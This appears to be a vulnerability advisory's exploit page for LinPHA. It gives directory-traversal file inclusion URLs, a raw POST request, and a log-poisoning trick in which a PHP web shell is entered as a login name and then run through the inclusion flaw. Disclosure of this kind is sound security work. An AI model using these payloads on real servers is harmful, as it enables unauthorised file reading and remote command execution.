• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

LinPHA Multiple Local File Inclusion and PHP Code Injection Vulnerabilities


The following URI examples were provided for the file inclusion issues:

http://www.example.com/[host]/docs/index.php?lang=/../../../../../../../../../../test
http://www.example.com/[path]/install/install.php?language=/../../../../../../../test
http://www.example.com/[path]/install/sec_stage_install.php?whatlang=1&language=/../../../../../../../testhttp://[target]/[path]/install/sec_stage_install.php?language=/../../../../../../../test


The following HTTP POST example was provided for the file inclusion issues:

POST [path]install/forth_stage_install.php HTTP/1.1\r\n";
Host: [somehost]
Content-Type: application/x-www-form-urlencoded
Content-Length: [data_length]
User-Agent: GameBoy, Powered by Nintendo
Connection: Close

language=/../../../../../../../../test


The file inclusion issues may allow for other system files to be retrieved if the 'magic_quotes_gpc' PHP directive is set to off.

The following steps were provided to exploit the PHP code injection issues:

1. Login with username: <?php system($_GET[cmd]);?>
and password: [whatever]

If the 'magic_quotes_gpc' is set to off, it is possible to launch operating system commands through the following request:

http://www.example.com/[path]/docs/index.php?cmd=ls%20-la&lang=/../../sql/tmp/linpha.log%00